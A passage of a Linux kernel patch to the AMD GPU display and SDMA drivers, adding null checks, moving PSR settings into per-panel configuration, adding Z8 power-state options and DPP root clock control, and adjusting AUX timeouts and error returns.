+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 4d780e4430e78..77d5a6f304094 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -1941,9 +1941,11 @@ static int sdma_v4_0_hw_fini(void *handle)
+ 		return 0;
+ 	}
+ 
+-	for (i = 0; i < adev->sdma.num_instances; i++) {
+-		amdgpu_irq_put(adev, &adev->sdma.ecc_irq,
+-			       AMDGPU_SDMA_IRQ_INSTANCE0 + i);
++	if (amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__SDMA)) {
++		for (i = 0; i < adev->sdma.num_instances; i++) {
++			amdgpu_irq_put(adev, &adev->sdma.ecc_irq,
++				       AMDGPU_SDMA_IRQ_INSTANCE0 + i);
++		}
+ 	}
+ 
+ 	sdma_v4_0_ctx_switch_enable(adev, false);
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 9c52af5005253..d150a90daa403 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -715,7 +715,7 @@ static int soc21_common_early_init(void *handle)
+ 			AMD_PG_SUPPORT_VCN_DPG |
+ 			AMD_PG_SUPPORT_GFX_PG |
+ 			AMD_PG_SUPPORT_JPEG;
+-		adev->external_rev_id = adev->rev_id + 0x1;
++		adev->external_rev_id = adev->rev_id + 0x80;
+ 		break;
+ 
+ 	default:
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 99b99f0b42c06..b46732cefe37c 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -39,6 +39,7 @@
+ #include "dc/dc_edid_parser.h"
+ #include "dc/dc_stat.h"
+ #include "amdgpu_dm_trace.h"
++#include "dc/inc/dc_link_ddc.h"
+ 
+ #include "vid.h"
+ #include "amdgpu.h"
+@@ -2254,6 +2255,14 @@ static void s3_handle_mst(struct drm_device *dev, bool suspend)
+ 		if (suspend) {
+ 			drm_dp_mst_topology_mgr_suspend(mgr);
+ 		} else {
++			/* if extended timeout is supported in hardware,
++			 * default to LTTPR timeout (3.2ms) first as a W/A for DP link layer
++			 * CTS 4.2.1.1 regression introduced by CTS specs requirement update.
++			 */
++			dc_link_aux_try_to_configure_timeout(aconnector->dc_link->ddc, LINK_AUX_DEFAULT_LTTPR_TIMEOUT_PERIOD);
++			if (!dp_is_lttpr_present(aconnector->dc_link))
++				dc_link_aux_try_to_configure_timeout(aconnector->dc_link->ddc, LINK_AUX_DEFAULT_TIMEOUT_PERIOD);
++
+ 			ret = drm_dp_mst_topology_mgr_resume(mgr, true);
+ 			if (ret < 0) {
+ 				dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
+@@ -7584,6 +7593,13 @@ static void amdgpu_dm_commit_cursors(struct drm_atomic_state *state)
+ 			handle_cursor_update(plane, old_plane_state);
+ }
+ 
++static inline uint32_t get_mem_type(struct drm_framebuffer *fb)
++{
++	struct amdgpu_bo *abo = gem_to_amdgpu_bo(fb->obj[0]);
++
++	return abo->tbo.resource ? abo->tbo.resource->mem_type : 0;
++}
++
+ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 				    struct dc_state *dc_state,
+ 				    struct drm_device *dev,
+@@ -7657,6 +7673,8 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 			continue;
+ 
+ 		dc_plane = dm_new_plane_state->dc_state;
++		if (!dc_plane)
++			continue;
+ 
+ 		bundle->surface_updates[planes_count].surface = dc_plane;
+ 		if (new_pcrtc_state->color_mgmt_changed) {
+@@ -7701,11 +7719,13 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 
+ 		/*
+ 		 * Only allow immediate flips for fast updates that don't
+-		 * change FB pitch, DCC state, rotation or mirroing.
++		 * change memory domain, FB pitch, DCC state, rotation or
++		 * mirroring.
+ 		 */
+ 		bundle->flip_addrs[planes_count].flip_immediate =
+ 			crtc->state->async_flip &&
+-			acrtc_state->update_type == UPDATE_TYPE_FAST;
++			acrtc_state->update_type == UPDATE_TYPE_FAST &&
++			get_mem_type(old_plane_state->fb) == get_mem_type(fb);
+ 
+ 		timestamp_ns = ktime_get_ns();
+ 		bundle->flip_addrs[planes_count].flip_timestamp_in_us = div_u64(timestamp_ns, 1000);
+@@ -9199,8 +9219,9 @@ static int dm_update_plane_state(struct dc *dc,
+ 			return -EINVAL;
+ 		}
+ 
++		if (dm_old_plane_state->dc_state)
++			dc_plane_state_release(dm_old_plane_state->dc_state);
+ 
+-		dc_plane_state_release(dm_old_plane_state->dc_state);
+ 		dm_new_plane_state->dc_state = NULL;
+ 
+ 		*lock_and_validation_needed = true;
+@@ -9737,6 +9758,7 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 		ret = compute_mst_dsc_configs_for_state(state, dm_state->context, vars);
+ 		if (ret) {
+ 			DRM_DEBUG_DRIVER("compute_mst_dsc_configs_for_state() failed\n");
++			ret = -EINVAL;
+ 			goto fail;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index df74bc88e4600..e2f9141d6d938 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -1368,6 +1368,7 @@ int pre_validate_dsc(struct drm_atomic_state *state,
+ 	ret = pre_compute_mst_dsc_configs_for_state(state, local_dc_state, vars);
+ 	if (ret != 0) {
+ 		DRM_INFO_ONCE("pre_compute_mst_dsc_configs_for_state() failed\n");
++		ret = -EINVAL;
+ 		goto clean_exit;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_smu.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_smu.c
+index 090b2c02aee17..0827c7df28557 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_smu.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn31/dcn31_smu.c
+@@ -333,8 +333,8 @@ void dcn31_smu_set_zstate_support(struct clk_mgr_internal *clk_mgr, enum dcn_zst
+ 			(support == DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY))
+ 		support = DCN_ZSTATE_SUPPORT_DISALLOW;
+ 
+-
+-	if (support == DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY)
++	if (support == DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY ||
++	    support == DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY)
+ 		param = 1;
+ 	else
+ 		param = 0;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+index aa264c600408d..0765334f08259 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+@@ -349,8 +349,6 @@ void dcn314_smu_set_zstate_support(struct clk_mgr_internal *clk_mgr, enum dcn_zs
+ 	if (!clk_mgr->smu_present)
+ 		return;
+ 
+-	// Arg[15:0] = 8/9/0 for Z8/Z9/disallow -> existing bits
+-	// Arg[16] = Disallow Z9 -> new bit
+ 	switch (support) {
+ 
+ 	case DCN_ZSTATE_SUPPORT_ALLOW:
+@@ -369,6 +367,16 @@ void dcn314_smu_set_zstate_support(struct clk_mgr_internal *clk_mgr, enum dcn_zs
+ 		param = (1 << 10);
+ 		break;
+ 
++	case DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY:
++		msg_id = VBIOSSMC_MSG_AllowZstatesEntry;
++		param = (1 << 10) | (1 << 8);
++		break;
++
++	case DCN_ZSTATE_SUPPORT_ALLOW_Z8_ONLY:
++		msg_id = VBIOSSMC_MSG_AllowZstatesEntry;
++		param = (1 << 8);
++		break;
++
+ 	default: //DCN_ZSTATE_SUPPORT_UNKNOWN
+ 		msg_id = VBIOSSMC_MSG_AllowZstatesEntry;
+ 		param = 0;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+index 9eb9fe5b8d2c5..1d84a04acb3f0 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+@@ -756,6 +756,8 @@ void dcn32_clk_mgr_construct(
+ 		struct pp_smu_funcs *pp_smu,
+ 		struct dccg *dccg)
+ {
++	struct clk_log_info log_info = {0};
++
+ 	clk_mgr->base.ctx = ctx;
+ 	clk_mgr->base.funcs = &dcn32_funcs;
+ 	if (ASICREV_IS_GC_11_0_2(clk_mgr->base.ctx->asic_id.hw_internal_rev)) {
+@@ -789,6 +791,7 @@ void dcn32_clk_mgr_construct(
+ 			clk_mgr->base.clks.ref_dtbclk_khz = 268750;
+ 	}
+ 
++
+ 	/* integer part is now VCO frequency in kHz */
+ 	clk_mgr->base.dentist_vco_freq_khz = dcn32_get_vco_frequency_from_reg(clk_mgr);
+ 
+@@ -796,6 +799,8 @@ void dcn32_clk_mgr_construct(
+ 	if (clk_mgr->base.dentist_vco_freq_khz == 0)
+ 		clk_mgr->base.dentist_vco_freq_khz = 4300000; /* Updated as per HW docs */
+ 
++	dcn32_dump_clk_registers(&clk_mgr->base.boot_snapshot, &clk_mgr->base, &log_info);
++
+ 	if (ctx->dc->debug.disable_dtb_ref_clk_switch &&
+ 			clk_mgr->base.clks.ref_dtbclk_khz != clk_mgr->base.boot_snapshot.dtbclk) {
+ 		clk_mgr->base.clks.ref_dtbclk_khz = clk_mgr->base.boot_snapshot.dtbclk;
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index bf7fcd268cb47..6299130663a3d 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -3381,7 +3381,7 @@ bool dc_link_setup_psr(struct dc_link *link,
+ 		case FAMILY_YELLOW_CARP:
+ 		case AMDGPU_FAMILY_GC_10_3_6:
+ 		case AMDGPU_FAMILY_GC_11_0_1:
+-			if (dc->debug.disable_z10)
++			if (dc->debug.disable_z10 || dc->debug.psr_skip_crtc_disable)
+ 				psr_context->psr_level.bits.SKIP_CRTC_DISABLE = true;
+ 			break;
+ 		default:
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index fd8db482e56f9..f0d05829288bd 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -1707,6 +1707,9 @@ bool dc_remove_plane_from_context(
+ 	struct dc_stream_status *stream_status = NULL;
+ 	struct resource_pool *pool = dc->res_pool;
+ 
++	if (!plane_state)
++		return true;
++
+ 	for (i = 0; i < context->stream_count; i++)
+ 		if (context->streams[i] == stream) {
+ 			stream_status = &context->stream_status[i];
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index 0598465fd1a1b..3f277009075fd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -491,6 +491,8 @@ enum dcn_pwr_state {
+ enum dcn_zstate_support_state {
+ 	DCN_ZSTATE_SUPPORT_UNKNOWN,
+ 	DCN_ZSTATE_SUPPORT_ALLOW,
++	DCN_ZSTATE_SUPPORT_ALLOW_Z8_ONLY,
++	DCN_ZSTATE_SUPPORT_ALLOW_Z8_Z10_ONLY,
+ 	DCN_ZSTATE_SUPPORT_ALLOW_Z10_ONLY,
+ 	DCN_ZSTATE_SUPPORT_DISALLOW,
+ };
+@@ -764,7 +766,6 @@ struct dc_debug_options {
+ 	bool disable_mem_low_power;
+ 	bool pstate_enabled;
+ 	bool disable_dmcu;
+-	bool disable_psr;
+ 	bool force_abm_enable;
+ 	bool disable_stereo_support;
+ 	bool vsr_support;
+@@ -780,6 +781,7 @@ struct dc_debug_options {
+ 	unsigned int force_odm_combine; //bit vector based on otg inst
+ 	unsigned int seamless_boot_odm_combine;
+ 	unsigned int force_odm_combine_4to1; //bit vector based on otg inst
++	int minimum_z8_residency_time;
+ 	bool disable_z9_mpc;
+ 	unsigned int force_fclk_khz;
+ 	bool enable_tri_buf;
+@@ -828,6 +830,7 @@ struct dc_debug_options {
+ 	int crb_alloc_policy_min_disp_count;
+ 	bool disable_z10;
+ 	bool enable_z9_disable_interface;
++	bool psr_skip_crtc_disable;
+ 	union dpia_debug_options dpia_debug;
+ 	bool disable_fixed_vs_aux_timeout_wa;
+ 	bool force_disable_subvp;
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_link.h b/drivers/gpu/drm/amd/display/dc/dc_link.h
+index caf0c7af2d0b9..17f080f8af6cd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_link.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_link.h
+@@ -117,7 +117,7 @@ struct psr_settings {
+  * Add a struct dc_panel_config under dc_link
+  */
+ struct dc_panel_config {
+-	// extra panel power sequence parameters
++	/* extra panel power sequence parameters */
+ 	struct pps {
+ 		unsigned int extra_t3_ms;
+ 		unsigned int extra_t7_ms;
+@@ -127,13 +127,21 @@ struct dc_panel_config {
+ 		unsigned int extra_t12_ms;
+ 		unsigned int extra_post_OUI_ms;
+ 	} pps;
+-	// ABM
++	/* PSR */
++	struct psr {
++		bool disable_psr;
++		bool disallow_psrsu;
++		bool rc_disable;
++		bool rc_allow_static_screen;
++		bool rc_allow_fullscreen_VPB;
++	} psr;
++	/* ABM */
+ 	struct varib {
+ 		unsigned int varibright_feature_enable;
+ 		unsigned int def_varibright_level;
+ 		unsigned int abm_config_setting;
+ 	} varib;
+-	// edp DSC
++	/* edp DSC */
+ 	struct dsc {
+ 		bool disable_dsc_edp;
+ 		unsigned int force_dsc_edp_policy;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 55d63d860ef10..0dcd9fea122d0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -726,11 +726,15 @@ void dcn10_hubp_pg_control(
+ 	}
+ }
+ 
+-static void power_on_plane(
++static void power_on_plane_resources(
+ 	struct dce_hwseq *hws,
+ 	int plane_id)
+ {
+ 	DC_LOGGER_INIT(hws->ctx->logger);
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, plane_id, true);
++
+ 	if (REG(DC_IP_REQUEST_CNTL)) {
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 1);
+@@ -1237,11 +1241,15 @@ void dcn10_plane_atomic_power_down(struct dc *dc,
+ 			hws->funcs.hubp_pg_control(hws, hubp->inst, false);
+ 
+ 		dpp->funcs->dpp_reset(dpp);
++
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 0);
+ 		DC_LOG_DEBUG(
+ 				"Power gated front end %d\n", hubp->inst);
+ 	}
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, dpp->inst, false);
+ }
+ 
+ /* disable HW used by plane.
+@@ -2450,7 +2458,7 @@ static void dcn10_enable_plane(
+ 
+ 	undo_DEGVIDCN10_253_wa(dc);
+ 
+-	power_on_plane(dc->hwseq,
++	power_on_plane_resources(dc->hwseq,
+ 		pipe_ctx->plane_res.hubp->inst);
+ 
+ 	/* enable DCFCLK current DCHUB */
+@@ -3369,7 +3377,9 @@ static bool dcn10_can_pipe_disable_cursor(struct pipe_ctx *pipe_ctx)
+ 	for (test_pipe = pipe_ctx->top_pipe; test_pipe;
+ 	     test_pipe = test_pipe->top_pipe) {
+ 		// Skip invisible layer and pipe-split plane on same layer
+-		if (!test_pipe->plane_state->visible || test_pipe->plane_state->layer_index == cur_layer)
++		if (!test_pipe->plane_state ||
++		    !test_pipe->plane_state->visible ||
++		    test_pipe->plane_state->layer_index == cur_layer)
+ 			continue;
+ 
+ 		r2 = test_pipe->plane_res.scl_data.recout;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index f348bc15a9256..2d49e99a152c4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -1087,11 +1087,15 @@ void dcn20_blank_pixel_data(
+ }
+ 
+ 
+-static void dcn20_power_on_plane(
++static void dcn20_power_on_plane_resources(
+ 	struct dce_hwseq *hws,
+ 	struct pipe_ctx *pipe_ctx)
+ {
+ 	DC_LOGGER_INIT(hws->ctx->logger);
++
++	if (hws->funcs.dpp_root_clock_control)
++		hws->funcs.dpp_root_clock_control(hws, pipe_ctx->plane_res.dpp->inst, true);
++
+ 	if (REG(DC_IP_REQUEST_CNTL)) {
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0,
+ 				IP_REQUEST_EN, 1);
+@@ -1115,7 +1119,7 @@ static void dcn20_enable_plane(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ 	//if (dc->debug.sanity_checks) {
+ 	//	dcn10_verify_allow_pstate_change_high(dc);
+ 	//}
+-	dcn20_power_on_plane(dc->hwseq, pipe_ctx);
++	dcn20_power_on_plane_resources(dc->hwseq, pipe_ctx);
+ 
+ 	/* enable DCFCLK current DCHUB */
+ 	pipe_ctx->plane_res.hubp->funcs->hubp_clk_cntl(pipe_ctx->plane_res.hubp, true);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn21/dcn21_resource.c b/drivers/gpu/drm/amd/display/dc/dcn21/dcn21_resource.c
+index 887081472c0d8..ce6c70e25703d 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn21/dcn21_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn21/dcn21_resource.c
+@@ -671,12 +671,15 @@ static const struct dc_debug_options debug_defaults_diags = {
+ 		.disable_pplib_wm_range = true,
+ 		.disable_stutter = true,
+ 		.disable_48mhz_pwrdwn = true,
+-		.disable_psr = true,
+ 		.enable_tri_buf = true,
+ 		.use_max_lb = true
+ };
+ 
+ static const struct dc_panel_config panel_config_defaults = {
++		.psr = {
++			.disable_psr = false,
++			.disallow_psrsu = false,
++		},
+ 		.ilr = {
+ 			.optimize_edp_link_rate = true,
+ 		},
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+index e958f838c8041..5a8d1a0513149 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+@@ -723,7 +723,6 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 	.underflow_assert_delay_us = 0xFFFFFFFF,
+ 	.dwb_fi_phase = -1, // -1 = disable,
+ 	.dmub_command_table = true,
+-	.disable_psr = false,
+ 	.use_max_lb = true,
+ 	.exit_idle_opt_for_cursor_updates = true
+ };
+@@ -742,11 +741,17 @@ static const struct dc_debug_options debug_defaults_diags = {
+ 	.scl_reset_length10 = true,
+ 	.dwb_fi_phase = -1, // -1 = disable
+ 	.dmub_command_table = true,
+-	.disable_psr = true,
+ 	.enable_tri_buf = true,
+ 	.use_max_lb = true
+ };
+ 
++static const struct dc_panel_config panel_config_defaults = {
++	.psr = {
++		.disable_psr = false,
++		.disallow_psrsu = false,
++	},
++};
++
+ static void dcn30_dpp_destroy(struct dpp **dpp)
+ {
+ 	kfree(TO_DCN20_DPP(*dpp));
+@@ -2214,6 +2219,11 @@ void dcn30_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params
+ 	}
+ }
+ 
++static void dcn30_get_panel_config_defaults(struct dc_panel_config *panel_config)
++{
++	*panel_config = panel_config_defaults;
++}
++
+ static const struct resource_funcs dcn30_res_pool_funcs = {
+ 	.destroy = dcn30_destroy_resource_pool,
+ 	.link_enc_create = dcn30_link_encoder_create,
+@@ -2233,6 +2243,7 @@ static const struct resource_funcs dcn30_res_pool_funcs = {
+ 	.release_post_bldn_3dlut = dcn30_release_post_bldn_3dlut,
+ 	.update_bw_bounding_box = dcn30_update_bw_bounding_box,
+ 	.patch_unknown_plane_state = dcn20_patch_unknown_plane_state,
++	.get_panel_config_defaults = dcn30_get_panel_config_defaults,
+ };
+ 
+ #define CTX ctx
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn302/dcn302_resource.c b/drivers/gpu/drm/amd/display/dc/dcn302/dcn302_resource.c
+index b925b6ddde5a3..d3945876aceda 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn302/dcn302_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn302/dcn302_resource.c
+@@ -112,10 +112,16 @@ static const struct dc_debug_options debug_defaults_diags = {
+ 		.dwb_fi_phase = -1, // -1 = disable
+ 		.dmub_command_table = true,
+ 		.enable_tri_buf = true,
+-		.disable_psr = true,
+ 		.use_max_lb = true
+ };
+ 
++static const struct dc_panel_config panel_config_defaults = {
++		.psr = {
++			.disable_psr = false,
++			.disallow_psrsu = false,
++		},
++};
++
+ enum dcn302_clk_src_array_id {
+ 	DCN302_CLK_SRC_PLL0,
+ 	DCN302_CLK_SRC_PLL1,
+@@ -1132,6 +1138,11 @@ void dcn302_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_param
+ 	DC_FP_END();
+ }
+ 
++static void dcn302_get_panel_config_defaults(struct dc_panel_config *panel_config)
++{
++	*panel_config = panel_config_defaults;
++}
++
+ static struct resource_funcs dcn302_res_pool_funcs = {
+ 		.destroy = dcn302_destroy_resource_pool,
+ 		.link_enc_create = dcn302_link_encoder_create,
+@@ -1151,6 +1162,7 @@ static struct resource_funcs dcn302_res_pool_funcs = {
+ 		.release_post_bldn_3dlut = dcn30_release_post_bldn_3dlut,
+ 		.update_bw_bounding_box = dcn302_update_bw_bounding_box,
+ 		.patch_unknown_plane_state = dcn20_patch_unknown_plane_state,
++		.get_panel_config_defaults = dcn302_get_panel_config_defaults,
+ };
+ 
+ static struct dc_cap_funcs cap_funcs = {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c b/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
+index 527d5c9028785..7e7f18bef0986 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn303/dcn303_resource.c
+@@ -96,7 +96,13 @@ static const struct dc_debug_options debug_defaults_diags = {
+ 		.dwb_fi_phase = -1, // -1 = disable
+ 		.dmub_command_table = true,
+ 		.enable_tri_buf = true,
+-		.disable_psr = true,
++};
++
++static const struct dc_panel_config panel_config_defaults = {
++		.psr = {
++			.disable_psr = false,
++			.disallow_psrsu = false,
++		},
+ };
+ 
+ enum dcn303_clk_src_array_id {
+@@ -1055,6 +1061,10 @@ static void dcn303_destroy_resource_pool(struct resource_pool **pool)
+ 	*pool = NULL;
+ }
+ 
++static void dcn303_get_panel_config_defaults(struct dc_panel_config *panel_config)
++{
++	*panel_config = panel_config_defaults;
++}
+ 
+ void dcn303_update_bw_bounding_box(struct dc *dc, struct clk_bw_params *bw_params)
+ {
+@@ -1082,6 +1092,7 @@ static struct resource_funcs dcn303_res_pool_funcs = {
+ 		.release_post_bldn_3dlut = dcn30_release_post_bldn_3dlut,
+ 		.update_bw_bounding_box = dcn303_update_bw_bounding_box,
+ 		.patch_unknown_plane_state = dcn20_patch_unknown_plane_state,
++		.get_panel_config_defaults = dcn303_get_panel_config_defaults,
+ };
+ 
+ static struct dc_cap_funcs cap_funcs = {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+index 7f34418e63081..7d2b982506fd7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+@@ -66,17 +66,8 @@ void dccg31_update_dpp_dto(struct dccg *dccg, int dpp_inst, int req_dppclk)
+ 		REG_UPDATE(DPPCLK_DTO_CTRL,
+ 				DPPCLK_DTO_ENABLE[dpp_inst], 1);
+ 	} else {
+-		//DTO must be enabled to generate a 0Hz clock output
+-		if (dccg->ctx->dc->debug.root_clock_optimization.bits.dpp) {
+-			REG_UPDATE(DPPCLK_DTO_CTRL,
+-					DPPCLK_DTO_ENABLE[dpp_inst], 1);
+-			REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
+-					DPPCLK0_DTO_PHASE, 0,
+-					DPPCLK0_DTO_MODULO, 1);
+-		} else {
+-			REG_UPDATE(DPPCLK_DTO_CTRL,
+-					DPPCLK_DTO_ENABLE[dpp_inst], 0);
+-		}
++		REG_UPDATE(DPPCLK_DTO_CTRL,
++				DPPCLK_DTO_ENABLE[dpp_inst], 0);
+ 	}
+ 	dccg->pipe_dppclk_khz[dpp_inst] = req_dppclk;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+index d825f11b4feaa..d3f76512841b4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+@@ -911,6 +911,10 @@ static const struct dc_debug_options debug_defaults_diags = {
+ };
+ 
+ static const struct dc_panel_config panel_config_defaults = {
++	.psr = {
++		.disable_psr = false,
++		.disallow_psrsu = false,
++	},
+ 	.ilr = {
+ 		.optimize_edp_link_rate = true,
+ 	},
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+index 389a8938ee451..85ea3334355c2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dccg.c
+@@ -289,8 +289,31 @@ static void dccg314_set_valid_pixel_rate(
+ 	dccg314_set_dtbclk_dto(dccg, &dto_params);
+ }
+ 
++static void dccg314_dpp_root_clock_control(
++		struct dccg *dccg,
++		unsigned int dpp_inst,
++		bool clock_on)
++{
++	struct dcn_dccg *dccg_dcn = TO_DCN_DCCG(dccg);
++
++	if (clock_on) {
++		/* turn off the DTO and leave phase/modulo at max */
++		REG_UPDATE(DPPCLK_DTO_CTRL, DPPCLK_DTO_ENABLE[dpp_inst], 0);
++		REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
++			  DPPCLK0_DTO_PHASE, 0xFF,
++			  DPPCLK0_DTO_MODULO, 0xFF);
++	} else {
++		/* turn on the DTO to generate a 0hz clock */
++		REG_UPDATE(DPPCLK_DTO_CTRL, DPPCLK_DTO_ENABLE[dpp_inst], 1);
++		REG_SET_2(DPPCLK_DTO_PARAM[dpp_inst], 0,
++			  DPPCLK0_DTO_PHASE, 0,
++			  DPPCLK0_DTO_MODULO, 1);
++	}
++}
++
+ static const struct dccg_funcs dccg314_funcs = {
+ 	.update_dpp_dto = dccg31_update_dpp_dto,
++	.dpp_root_clock_control = dccg314_dpp_root_clock_control,
+ 	.get_dccg_ref_freq = dccg31_get_dccg_ref_freq,
+ 	.dccg_init = dccg31_init,
+ 	.set_dpstreamclk = dccg314_set_dpstreamclk,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+index 8e824dc81dede..414d7358a075f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+@@ -392,6 +392,16 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx)
+ 				pix_per_cycle);
+ }
+ 
++void dcn314_dpp_root_clock_control(struct dce_hwseq *hws, unsigned int dpp_inst, bool clock_on)
++{
++	if (!hws->ctx->dc->debug.root_clock_optimization.bits.dpp)
++		return;
++
++	if (hws->ctx->dc->res_pool->dccg->funcs->dpp_root_clock_control)
++		hws->ctx->dc->res_pool->dccg->funcs->dpp_root_clock_control(
++			hws->ctx->dc->res_pool->dccg, dpp_inst, clock_on);
++}
++
+ void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on)
+ {
